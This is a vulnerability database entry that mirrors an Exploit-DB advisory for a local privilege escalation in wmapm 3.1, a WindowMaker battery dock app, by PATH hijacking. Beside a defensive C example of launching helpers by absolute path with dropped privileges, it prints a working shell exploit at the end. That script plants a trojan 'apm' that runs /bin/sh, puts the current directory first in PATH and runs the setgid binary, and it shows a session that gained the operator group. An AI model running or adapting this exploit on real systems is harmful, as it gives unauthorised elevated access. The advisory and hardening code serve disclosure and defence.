WMAPM 3.1 – Local Privilege Escalation

Vulnerability ID: 1054239
Vulnerability type:
Published: 2003-11-08
Updated: 2003-11-08
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux
CVSS score: N/A
Vulnerability source
https://www.exploit-db.com/exploits/23364
Vulnerability details
Vulnerability details have not been disclosed.
Exploit
source: http://www.securityfocus.com/bid/8995/info

wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to.
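
The root cause described above is a setuid/setgid program resolving a helper's name through the caller's PATH. The following C code is an added example, not wmapm's code and not part of the original advisory: it audits a PATH value for current-directory entries and launches a helper by absolute path with dropped privileges and a fixed environment. The function names, the fixed PATH value, the `system("apm")` call it replaces, and the premise that the helper needs no elevated IDs are assumptions.

```c
#define _XOPEN_SOURCE 700
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 if a colon-separated PATH has an entry that resolves against the
 * current directory: ".", any other non-absolute entry, or an empty entry. */
int path_has_unsafe_entry(const char *path)
{
    for (const char *p = path;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 1;
        if (!end)
            return 0;
        p = end + 1;
    }
}

/* Hardened stand-in for a privileged program calling system("apm") (assumed
 * call; wmapm's source is not on the page). Assumes the helper needs no
 * elevated IDs; if it does, omit the drop and keep the rest.
 * Returns the helper's exit status, or -1 on refusal or failure. */
int run_helper_safely(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;
    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                         /* refuse PATH-resolved names */
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        /* Drop group first, then user; setre*id also resets the saved IDs. */
        if (setregid(getgid(), getgid()) != 0 || setreuid(getuid(), getuid()) != 0)
            _exit(126);
        execve(abs_path, argv, clean_env); /* no PATH search, no shell */
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char *const argv[] = { "sh", "-c", "exit 0", NULL };
    return run_helper_safely("/bin/sh", argv);
}
```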

#!/bin/sh
# Pretty useless, we can mess up /etc/dumpdates or run shutdown
# on FreeBSD systems with wmapm from ports.
# If wmapm is installed from source we get root instead,
# so I suppose this might be worth something(uid 0) on linux.
# kokanin@dtors~ pkg_info | grep -i wmapm
# wmapm-3.1           Laptop battery status display for WindowMaker
# kokanin@dtors~ ls -la `which wmapm`    
# -rwxr-sr-x  1 root  operator  41892 Mar 23 10:00 /usr/X11R6/bin/wmapm
# kokanin@dtors~ sh DSR-wmapm.sh
# press the S button when wmapm starts
# $ /usr/bin/id
# uid=1001(kokanin) gid=1001(kokanin) egid=5(operator) groups=5(operator), 1001(kokanin), 0(wheel), 666(lewsers)
echo "/bin/sh" > apm
chmod +x ./apm
echo "press the S button(not the key, the BUTTON, in the PROGRAM) when wmapm starts"
export PATH=.:$PATH
/usr/X11R6/bin/wmapm
rm ./apm
